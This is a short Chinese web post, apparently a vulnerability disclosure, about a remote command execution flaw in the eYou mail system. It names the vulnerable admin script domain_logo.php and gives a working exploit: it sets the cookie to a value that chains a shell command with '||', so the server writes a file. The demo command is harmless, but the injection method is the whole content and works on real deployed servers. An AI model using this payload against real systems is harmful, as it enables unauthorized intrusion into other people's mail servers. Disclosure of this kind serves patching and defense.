eYou邮件系统远程命令执行

#1 漏洞代码

/grad/admin/domain_logo.php

#2 漏洞利用

访问http://secmap.cn/grad/admin/domain_logo.php

修改cookie 值为:aa|| echo test>>test.txt 刷新 便可以在该目录下生成test.txt
eyou

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录